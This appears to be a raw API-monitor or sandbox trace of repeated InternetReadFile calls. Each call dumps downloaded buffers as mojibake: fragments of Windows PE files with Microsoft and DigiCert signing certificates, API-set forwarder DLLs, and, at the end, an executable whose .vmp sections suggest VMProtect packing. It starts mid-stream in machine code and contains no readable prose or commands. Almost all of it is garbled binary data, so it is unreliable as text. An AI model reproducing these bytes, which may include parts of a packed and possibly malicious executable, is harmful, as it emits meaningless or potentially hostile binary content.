…ÿt"òò€0ë(hàÿÿè?âƒÄ¸ÿÿÿÿë&ǀ4¦¦¦¦Ç€0¦¦¦¦jVjjRQPèyƒÄ^_]ÃÌÌÌÌÌÌÌÌU‰åSWVhOèÿáƒÄ…Àt0‰Ç1ö‰€8ƒÇƒçðtk‹] ‹E‹U‹M…Ûtòò‡0ë%hàÿÿè²áƒÄ1öë<LJ4¦¦¦¦Ç‡0¦¦¦¦jRjjPQWè…xƒÄ…À
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: œH™i)¡ŒN¨ãæ¾IÌeV=Ä0' +‚7 10¡€https://mozilla.org0  *†H†÷ ‚(¢êh”!è eýFˆ%mݨŠ&µ‡gwº<ˆÚÌ3ÐJÁªœ¥Ùn¥¬*4€PðhPYçډetjæî}@³~?äàP|À¢¾4=ãóUÙÌøM„ßbCD¶.®Õ ‚4nÛRR5bÅHë­¿Ï3^eüÇ~j05Í’ãðú.²'ð@ìŒøÇ®K}Bʧ—ü6‡Íñ0µle´ôŸò—i’»ØÔéLÎmkÝ|eã7WGŽã¡+YDÂÕiP͕±ÿº¥>µ©HB‚å:–çy±ãRjÄßaN°0¦r6•ãɼ!¹¹ÛíUg üÅʀ‚(ÍÁÝ Æ ÷)òÓ¬-x~‰aäy裪@dYv¡“~l”í1@ا|%š ž(f_O™izgÎMvgä»ÂÎ¥|Š¥w¬<Ðþ6 ¿éΈ eBI¨ßH—“¤zѼë›3Î×ÇSsГöҐÉSN“r¼…ä}Ý(zƒO‹’¾~ÙJÍLí©sv¾Ò€’˜LƐ—s@C1ýsÊÜ»”`ß ×v] ÃdJ±4?‡Ì™óž±ˆr<ßÆê€fiÛ}dÎÆgð‘Fììôî¼·d¥Fƒ›lR*ã7¾0c›'j‡2ó—oºiç¦?\hånbŠlà,0Ê 2%¦¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" J–èW´Ý†sâö(C‡ÓjH¶ÊwU9 ^«m͵0  *†H†÷ ‚FS$Ð¥þ?]E’~lël†J±>F)Î.êÇøƒs?ß°=+þþìÿ^ @µ§Ÿù +“[Ü^ö;g¹QÜÅ_OF§vùl>ûBx1‰ODéï] ë¬Àr–›Åƒ²'6Ï&¸¤Â7Y:ª>`¼åØÆS5¾_÷ŒÁ‰8÷i’à6@ù­xÚ$ Ýè‹F%‹…ÎxNÅôOÅ=ò ã.‡Í«3—î#ÒÎ̔×kéϱ™n‹]-á»’VBƒqůJ- F)F!ïXԐ77ž§Vaèü•N–`°x!IʲÇ˽ÞrÞÊÕdÏIðÒCFÆMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELyî¯`à"! ¦îP¨àœ@ADSS—Tðx˜¸ 4DNÀ XŒ.text&¤¦ `.rdataÔ¨Àªª@@.data@ pT@À.00cfg€\@@.rsrcx^@@.reloc4 6b@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ÷ ‚2OaÐÝp[AØ5¦]†°¶4^\`ű‹¢tq²ØìxՖzÓÄU£xÒö̉rç3gnˆªjÛ{Š`ѾT¾0à¯ï$;ªËþà*Ž\•ªÎCtêš&—3$ó`Àá[ý§A¨TÔåT®N,º¢w¯Ýô,¨¸pÂÀߢ/zÈë$cbAȒ+C EVw@b¿#¾Mˆ´j‰ÎÌÔýö°×¹ZE ú —'3µóZ…—„÷ófJ¼EÅ¥7£ŽI0c¼7Ìmr’Ffâ퓍ߣCë9”I÷îÍÐ9Õc Ä"å…6~3AË¹i–Øï*Ù&ߥ&_̾¯õ²_åPjÔlU^‚‚ùë7¥°4y}ŒÙ°½ u­ÿ­¿ë§ô½Œ‹¹I%h÷%ÓÈ \ñ«Kg6>t÷8eiht)#7Q[g+ Þ?ø‹–oÞîúTÈЅoL” T­™³«8ښ½C:íú³X2/š-ãÇ5}@üUÙôÍù¦–=ˆX¶ÍS-€/}¦y,~n~ƒÎÎqçÀeQ^ÿQÕ¯×þ<§}²×˜±º'þw3‰•á&݊š•)õc^HÛa«åÐáÒOðO¥ìŸ к¾Ó48ß?”³ˆOžY#Cx¾Q‹/‹BBpÒ² K›‰¥Æ›…Êo H›¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" šÐôãÖ£²1€›Y£{iÆà¼‘ª(p ÝûEeéï0  *†H†÷ ‚C‰%*QRíV`äӝAü"ú„XÃzA¦âC–]Ö|K>éÛ^ʖќx²ÀP¹V;1t/ˆçÄ.ô’ÅO°g ú±‹ߒ"æJÚI¥œÒQå·+"#¡·ûQl[øþ·|¦‘çdù~x›¾e‹ö×íÛÀ&L?I!ȤAª ûÉÅþþæ·ôƃ´ÎÀÿ W£ÆUþ©È¢€¹á± ®ÞU„Ò2ގŒDÓ¼¥ß/>Tù„òeó2UD/§S„È)CùÕKcrñ2²DßÐր¶p‹,™Æñ N.´¯è¿˜)J 4$­šFÃ'-"YO ‚ù(:hŽáMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELIìOà!    0@ðL ð =T.text< `.rsrcð @@IìO8TTIìO dŒŒIìORSDSyN'Ò;rC¿ù¦Ðl{¤api-ms-win-core-file-l1-2-0.pdbT.rdataTœ.rdata$zzzdbgðL.edata `.rsrc$01` .rsrc$02IìO@(8lŽÆ`¤ñapi-ms-win-core-file-l1-2-0.dllCreateFile2kernel32.CreateFile2GetTempPathWkernel32.GetTempPathWGetVolumeNameForVolumeMountP
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 9Z$WÈ rP«Ð‰tì g)]Ôŵ <H¯ è¬çõ4ž½h43œx*Ò±}€õ: ¯:‡ÛYïIg£6w _/ íkó°›1f›1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" X™ϧ‡j¸¶ENŠQYÝá“n›ÝÉGÐ!Uøº³#0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚X¼´÷Yï;wnÂC™&ûv¸±Ú6H鄦š×Z]l%ˆ­<‡ ;<Ögëö¶$á2¬çÝj›¼bµÌڎ¡ª’–™vßƸŠIË `–Â|ãZƒ<sêo¾È{lbÖÆ}¤—õàS»ŸÄ$=ç²£î)7j|Xê[£×w4“LøImàD³hÑq“5úØäï¨}Ëk)@¨øá» BŠ–ZŠ¡“¶엍LÜØul“í1÷6aaÝÿ8Í^Á¿r<2å䰏g:̑ëÆs÷`£àóø¹ÊTAýÁ˜Àò~µ¶%2ːµÎ@”sßagÚé]?è´³Nu÷:3MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL%éàrà!    0“`@ð ð =T.text} `.rsrcð @@%éàr8TT%éàr dŒŒ%éàrRSDSäòVf0…°<☠Ûj\api-ms-win-core-file-l2-1-0.pdbT.rdataTœ.rdata$zzzdbgð.edata `.rsrc$01` .rsrc$02%éàr† Dp°Ï÷#PŠ¼ç;g¦Ãä<m°Ñ%Z api-ms-win-core-file-l2-1-0.dllCopyFile2kernel32.CopyFile2CopyFileExWkernel32.CopyFileExWCreateDirectoryExWkernel32.CreateDirectoryExWCreateHardLinkWkernel32.CreateHardLinkWCreateSymbolicLinkWkernel32.CreateSymbolicLinkWGetFileInformationByHandleExkernel32.GetFileInformationByHandleExMoveFile
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer:  ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ïs8.b˜©ÉídhÚ"Ýje1ä{و/^áÚÔpÕÈO0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0tìüe¨i©™¸¶Tÿÿ‹•½øYÂ0  *†H†÷  ‚ˆÒj´2ÕÝ*U+\è—qze¢>¡jÞIVBwéš>&‚4Þed(ˆ&3àÖ8WEäx/iR…ÊQvï¨Ãõ¢i¦¶SâŬOÉ쮿èE2ñÖo„ Çý.͏܀íKã¬ýۙhówˆ(êqßxzD=á­Îò]É¡®xîÓ­N¤¢$G:W¬ò`¸ù€í¥m¾#è©[œ§£ÝVM…|•Êäî>Ó_‡r/( ”¿þàý:p8 ‹Œ‘ÆEa¸N# ±OÂÿ¬¾Û†áÐþÍô.ßè5Ýu™Œ¸Ñáé§!(αû<‡Ï\,³+”uZ§¡_MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELc» @à!    0<H@Ç ð=T.textÇ  `.rsrcð @@c» @@TTc» @ d””c» @RSDS¾«ô@Ó¤ª&˜¤ê$&api-ms-win-core-localization-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgÇ .edata `.rsrc$01` .rsrc$02c» @v;;(³á <fµÜû5]‰²Ùý!Iq—¾àNƒÁø/j™Çø/^Àá/\ˆ¶â 8`„¨Ïû'P‡¿ö1[‚­žÑú)X}¦Íô (Kx£Êñ9b‰®×ò9l£èV‡´ãQtµÔ÷Ix¡Ôù&Sv›¾éAh¯ØNqœ  !"#$%&'()*+,-./0123456789:api-ms-win-core-localization-l1-2-0.dllConvertDefaultLoca
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: —Éʛ$è“y1ôý¦ÅL³ÎÇ°÷ìêj%2¾Üa¦2½ÁÈpõÜ£¿sÀË*vü8vG,Iə!´†EŸeéB$-™g5/ɄF+¯.ÂEñ8J8§š~+™1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" O«Ê™0¼“—’é´kü%¥|tªtüîðö–¼ R¿)0â *†H†÷   1Ò0Ï0Ì0±›Â5Ýû²&+1eP/S”i‚o0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0+âä’<„~®å‘ƒ“£MŸ"0  *†H†÷  ‚:’ï¢_´¤J҆yFXÃøY•–î8[ï3/(~KóØ5²ÈXo'[ wM¨¼ ‰P+®—ÅÒ2d‹S6T8­Emƒ!VÊä‰æg²ƒm=TZ0ŒnŝÍZR‰½L)é…ç,öqÑ”:Ôtâ‰ÖÄ4—ÎnùÄm£äiÆWZ ÄÁ\¸Ñ<Õ=¥¨Ø=h­G3:JzÚºÚn´$³†Ōã®@¢ÁrÂTŽVI2 ¾þ>%¡K4ÌÛÞ¿En~ +æÏc6â…p‰ñAd–ߍå!µsM±cñ&sӄ=}ýi¦|ëå›_içp«˜)ÆûÃF1‰4dMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELZ¬Îsà!    0¥¿@Ú ð =T.textÚ `.rsrcð @@Z¬ÎsBTTZ¬Îs d˜˜Z¬ÎsRSDS׬ój‚ñ°¶ýO×¢m÷hapi-ms-win-core-processthreads-l1-1-1.pdbT.rdataT¬.rdata$zzzdbgÚ.edata `.rsrc$01` .rsrc$02Z¬Îs´(`˜ô-l­è"W‹½ïNƒ·ÞP‘ÒFq®Õ3r api-ms-win-core-processthreads-l1-1-1.dllFlushInstructionCachekernel32.FlushInstructionCacheGetCurrentProcessorNumberkernel32.GetCurrentProcessorNumberGetCurrentProcessorNumberExkernel32.GetCurrentProcessorNumberExGetCurrentThreadStackLi
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: êÿ0ï0 ބð]06 +„Y 1(0&0  +„Y   0ã`¡ 0„€0  *†H†÷ ‚F´zxg¾‚uÈÜÞX¾©€:¬j-‰KžS7è7LŠCª‡Í²ÆZmíºêÄx`ÿŠ€B'ËP ‹6Þ@lP¸ªèeÒ'՘ü?}ç\æ±}“ŒG访Èñ„$÷‰ gⱟN6× ©w Ï…1WÒlîõäZ¸`…Ü¥·]ñÁ¸]Û¬=SԈç»~_ÊyÈìøƒ?<օg ! &Ž=°‡+–!—“ÅùB±|.öÏðƒo„þåV(փ¼OH¦ÐU[äÿA *u@®è¶î\3·eåì|ÅYM 4 8(o–[ 3ÚjO#ø1 w#fK¤Ê )¿?Û1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ®«Æ?¶Ìæ¯{ÃÐ+YR£„«1?G¿µJŸôS¢Œ0â *†H†÷   1Ò0Ï0Ì0±ÕãÐþY6äÂdYIé×"ŒÇEê 0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0åc¼ƒD²H¹$GV¨šµž¥0  *†H†÷  ‚§pæ/¥¥‚ë`=cuˆaÅè"h»m+fBÇ6Y°œš*³PrÙ °­~´…mZ¥MªïDŽ'm/&R°Èòµ©ö6­QÀ묏Û%ÿ~~w®ç”‹ÑÚ  û(%¨"y‹„¦ž4‘ßs´Éƶý¹7«H šŸtš7Y©¬¤ LˆµPñZ®ô=« Möª^°3SÎb¨ÐÌ«ÇlýãžüÌç 쳄Ê.M5žR©ë)}?øçØoá5}›ƒ ŸAÕDYç<´ßzƒt<YrÉ-ШTÂDÅܶ73œ)†sQdB(áG—:1osøå_Úöˆˆ7«MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL«>»²à!    0RÏ@v ð =T.textv `.rsrcð @@«>»²9TT«>»² d«>»²RSDS©ßÝ*YJeíå§ðX÷Qapi-ms-win-core-synch-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgv.edata `.rsrc$01` .rsrc$02«>»²Ò(l°RÁïWÛþ&b“Ãö$Wó6w°Û ;|Çø H…
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 0U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒ\0"20180419214500Z20180420214500Z0t0: +„Y 1,0*0 ރŒ\0ç0;0 ބÝÜ06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚#…&Àµøðnôþ¦ƒo"Ï''¶Â“öôO¯¯,}ÂN >G@ÔoÐg&ÙT}'"yIÖJÀÛ)ê:Ÿx5 ûŠ9͚í¨Úm“µ’_”5 š^ËõŒ1$¸HنH¦é@ µ§,<×ÚÛZ`ÂIsͶ{`€lê?ÚÚpjÎnîø¼à…„Èú»vÔÃÛèhÊgk-UB ˆÑH}vô"¹á>‘¶Ý“ÚظË%RÜúW¡#‹eeÕ0 í ëÁEü²ú©CøKÖCÂ@8 X‰ Äå_-~n¥Ü˕$ñ³Ó¾`â볃y^k8h1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ÈÁª*–æq •Þ:(@ÛbwSì•fÕ¿sªY0â *†H†÷   1Ò0Ï0Ì0±ä‚.26mt2Á!´ ë wÙ0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï· 70  *†H†÷  ‚k„ŸÑ{_,Ã7A÷$ŸÌhÊýU/Ôdn-ì‹{«&“<;ü‰5K~¡þÅøf åÑS"Aô¥‚,ªº ÿ|¿„kQ–õ£ˆXv+AM‡©Æ“w;U¯¹=U<™m åæce«R³¬‡Š.5ò\xbÎSy©¨ù_m‹É.³€:ü—l’«†ZP†»91¥›ÜìU¶ûc·Lßâ"gª…ùÍœd¿Äa€7®í 2xöNÉËuCIDðØ­°‰rÍù¼TÞ/ƒ/Ñ\‹| (ç(̞yyÎ!ëYÔÙ7'ÂDÿMI=ºî¢œHñz¡°’F­¿Á-ç†eÚ^k›MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELƒ} üà!    0a9@E ð =T.textE `.rsrcð @@ƒ} ü<TTƒ} ü dƒ} üRSDSfbf¹{£Á¬AïÅ~}api-ms-win-core-timezone-l1-1-0.pdb
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž2 Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒÈ0"20180419214648Z20180420214648Z0t0: +„Y 1,0*0 ރŒÈ0³0ž0 ބÞH06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚ÑyÄ £§"?ïk¤££’o ˜x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxòš¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«‡{_gùk‡À¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXƒt¦EV‡‚؈SÑÕù–4¯X¥F¼wÎXä .÷&Yµ`_ | Á¼çØwCC)ôöIZˆ]ײ£ÌíZ÷·ŠËŽ`Øè¡ßUÚ7\„'§oKq¯ÝWóÎu ßÝ×v…ôHd /ʅ![³R±ne”=äŠäžØÀ1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ¯üt-6XßØól.Í\° nÇxP…~F¦úÕ 0â *†H†÷   1Ò0Ï0Ì0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚bÁkBÜ_<qÂsO-ß<]s,¯·é—óïÚâ½z{m7ß Q'|ݟ¿¬úŽÉÌy`걂MlZ*Õë_4$ŋò•Ԉ/¯"o^‹ë´Ég»·Š«èžÓ¦á]TÈÑ ÈÝuë±&µ âÚO}';€(JH,÷ÏÑç©Fz oÐùks[q¥~_h;TÙÁ™θp,9̌ùê›:¸ÃP•õÔé¯,WÔíÏÝ5à ;0J°Û“åþ2+uûy‹/˜·OM@ ÊãXNñö ´ ò„öø ÀcTýõ!æE°¤'zØxYžÌðõÏ®ì‡ÂMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELxèÆöà!    0À¬@ð ð=T
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: oft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚.˜UéêC½0Ú^–I„ØBn›>·yÅ,—5mXpÖ©ýšùÞÕ¯3ŸeÄð?‘ù×ôâf_~É«wÉ2ߖÄZA§ „<1J4Šþ%VÓ</]’܃ø9ҺӅÇgÕ]çqÀ-éJ¬Ä9×"ŽÑž1©¨TVˆO5i¹‡¨¨òé7Ñ«HþŒø3¯"®'à՚nŠ“Åòk×Æ+@¾Xøe°t’Õ‘ß2…·"d£?(»µc†ãüf1}\Ó°D¬\'Ì+YDmì½Gàðãõu´ì\¥0<CM¬Ñ¸ã'ûT~‘‘S¢ÿï~lõ°=k„sAMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL”Qžà!    0N@e ð =T.textu `.rsrcð @@v˜”Qž9dd”Qž d  ”QžRSDSˆÏ¦5m(åá°nfŠúapi-ms-win-crt-locale-l1-1-0.pdbd.rdatad¬.rdata$zzzdbge.edata `.rsrc$01` .rsrc$02”Qž8ˆØ5hžÑE§Óÿ$Nt”´Öÿ$Db!R‡¾í s˜¿ð:k†«Æï9X api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_funcucrtbase.___lc_codepage_func___lc_collate_cp_funcucrtbase.___lc_collate_cp_func___lc_locale_name_funcucrtbase.___lc_locale_name_func___mb_cur_max_funcucrtbase.___mb_cur_max_func___mb_cur_max_l_funcucrtbase.___mb_cur_max_l_func__initialize_lconv_for_unsigned_charucrtbase.__initialize_lconv_for_unsigned_char__pctype_funcucrtbase.__pctype_func__pwctype_funcucrtbase.__pwctype_func_configthreadlocaleucrtbase._configthreadlocale_create_localeucrtbase._create_locale_free_localeucrtbase._free_locale_get_current_localeucrtbase._get_current_locale_getmbcpucrtbase._getmbcp_l
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ime-Stamp PCA 20103§d]Å(=D§0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" Ghq%ZÉñâì=sÐZWùòÐ1”]ÉÌØ0â *†H†÷   1Ò0Ï0Ì0±ä‚.26mt2Á!´ ë wÙ0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï· 70  *†H†÷  ‚„I¯Ií‹c`ÞHóJc‘¯mNéæOáö_óÒƒâëEõƒÖ”÷Öô”Ô› òÎ ÈBƒQc–Cki%º-h®kë0¨|š¾@²ˆIôù½&@uÅ+ö‘ äÍ $ªUÌï7÷‹¿p“4‘ó–Ød¸+ð¸,¥óà •Lø¯{¼ ž%cÝÎ2°:k¬‘’Òi>ÃtÄÌ|Äõ¶¦ û¼c ûòYsƒO)©^øêzÇÈㇱ.‘'ÝähœK¶Pˆìª 5a–o7‘(å– vò”«}ÛUDú0,¢ZáE“\ ªI±&cô‹¼dþå«È5:ž³¢¨ð 'WMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL2àÀÊà!  Úð K@ƒ×ððà=T.text“ØÚ `.rsrcððÜ@@v˜2àÀÊ:dd2àÀÊ d  2àÀÊRSDSTrXTŠ¯{ïÝbŽÝÛéñapi-ms-win-crt-private-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgƒ×.edatað`.rsrc$01`ð.rsrc$022àÀʦ>‹‹8d#5Ù>?-?U?’?Ê?î?@L@‹@·@ì@!ARA‚A°AßABBB€BÅBC>CvC©CÑCõCD>DwDÀDE[E˜EÇEöE'F]FŽF¿FýF8GkG“G²GÜGH7HYH„H¶HíHIEIsI IÇIêI J(JGJgJ†J¤JÂJàJþJK<KYKwK–K´KÒKòKL:L^L‚L©LÒLøL%M^MšMÓMN<N}NÀNO?O‚OÇO P;P_P‰PºPìPQPQ‚Q´QçQRHRxR¨RØR S=SpS SÐST0T`TT»TàTU-UUU~U¥UÎUùU!VHVqV›VÅVñV$W`W¤WåW!XbX¥XåX$YgY¬YîY
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 0  *†H†÷  ‚`îÎá}ŸyÆxÎL¤jgG—ŠrÊäÁ|ç-㏑g¼ètz?ÊéF$?¡Îð~OÒô}ôv86¥Ù‰oÊÅSï, •Ñ yÅÒîm<?‘Fé¹RÞß\✤MQjÂé“MFr&ù„ÿ“wÝè=Tü _‡½Utšéd¬°äÊ\;  UX°Ã˧¼Y,MB‘í[³0.’§“ŽN€ ®©y1ìR‘|•¯ÁÎ#Û™ÌjÃÄô,ud‚, Ø÷še¨\•œ~Xîyó‘!­ÛÍ,¿µˆrþ_vv2ˆ®R<m9.ÌN$I-/©fÖüh&¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:57C8-2D15-1C8B1%0#UMicrosoft Time-Stamp Service¢% 0 +œœÅk˜Ì§Á­G ìÓDüÎmÐꠁÁ0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŽñ0"20180419215601Z20180420215601Z0t0: +„Y 1,0*0 ރŽñ0'0×0 ބàq06 +„Y 1(0&0  +„Y   0ã`¡ 0„€0  *†H†÷ ‚‘qS;¾gJÚ& Z©ÄÔ¸ÝíÜ>{~œM+Ó“·ÓÍö_Ð@'‘­ÐÔí]µ!„œWVzPšÝÛ:‡'rå¯Õ±¯€s }рƒä'p?#ê9Åñͼ³Ä=«¶Š=mE¶ˆÑ k:܋¼ºÒ”à e’ /  oÇëV‘°1{‚oÒ½nÂ7ÚÚæ^Z¸JÜÀ&&û®¹ïhò92Ša^ñ¨û^BA1ÜRí 5–A⠀ô64·sãݪnòDlˆþIl¼Eص Ûç*­…¬J“´kÎÙ àãQ¢ë÷2âBQKðøÿUEøû¡n=MD¥<KNå¿1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ˆÿêWà ª0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ¹1®¹´GTóo…•þs1)_-súñ\éÖ(¾õ;ÿëY0â *†H†÷   1Ò0Ï0Ì0±œœÅk˜Ì§Á­G ìÓDüÎmÐê0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ˆÿêWà ª0™ßW )”[ËK¸D, ØBÂ㤤0  *†H†÷  ‚œ´íö[Y_ë)PS‰ÜgFA¤ÒÏkƒ2 .1C®•o!¦I"b ©è¿„N¯˜ òZvMÃåçÓÏ&öÏfƊE¸°ÖL‚Ž•÷ßî¹cŠ»M¨ S–2¾ÝåT*/?;ÐFþÊ»23˜qøc+BqÁ…z²Hє¢Í ~ÍGg%£Ömºåm|&ı²fOÞpiñr)¹²d'…퓍 PCŒÕ~­ûãž6NÑ«hø'ï:~xŽà­X ½s`èq‰ Úh¡n^pʁ¤‰βÔýU³{{È'Ó ¯3b BÞz̞1̘ñ¿o¶ãÈMu´ÂOMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode.
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‚;kaà 8>¹ÈeP@PkUÏB@l+ àiefÐiÌÀÅi@Yh.textç7 `.rdataÀYP@@.dataœ°@À.vmp00&Ð``.vmp1`·@)¸@``.relocÌÐi¼@@B.rsrcefàihÂ@@@kt½bM |åe[wx4XQºy zY(g#6Ik¶Re‰ Œ`ec…Šo:_œ`M¢Z1©`³E6Hµ< 3` 7ú1tII´.¢&×9—/_=Ò+°_'EWç;yìvJ‡WŽ n.¼KÍTWLmE8Pp½X!¨T§vfA×Lé TQ‹WzSæ[ü8vá,M']:×)oL;ÙnUÿ,$™a¬, ßBXuÊi¢2 Q6(Õ Ó:ag@m9ÆleeA’™ …^N"'\U¸']JþQuHú/“o$C ü õÎ"}@IwHïZO:Q3Ùõééèû=é.E)@ù5µdÜpf…áém3é0;3‹€úï3ÓøÁÊf÷Çëùêy/‡]ÁÊõÊ÷Ú3Úõêé4÷ÐHùfý M3Øøùõèé½z6÷Ñé^Õ2‹×f«áÒÁ¿üÿÿÿ‰œÁºùâÀɍ¶üÿÿÿÒÍ»á‹3ËIÑÁé>±/ÉéÛ'4‹<°fº3JfÚy@6f¶f«ùÓÉø¶f¤ùmf‰f…ófÓ፭üÿÿÿÓÙfÑ7 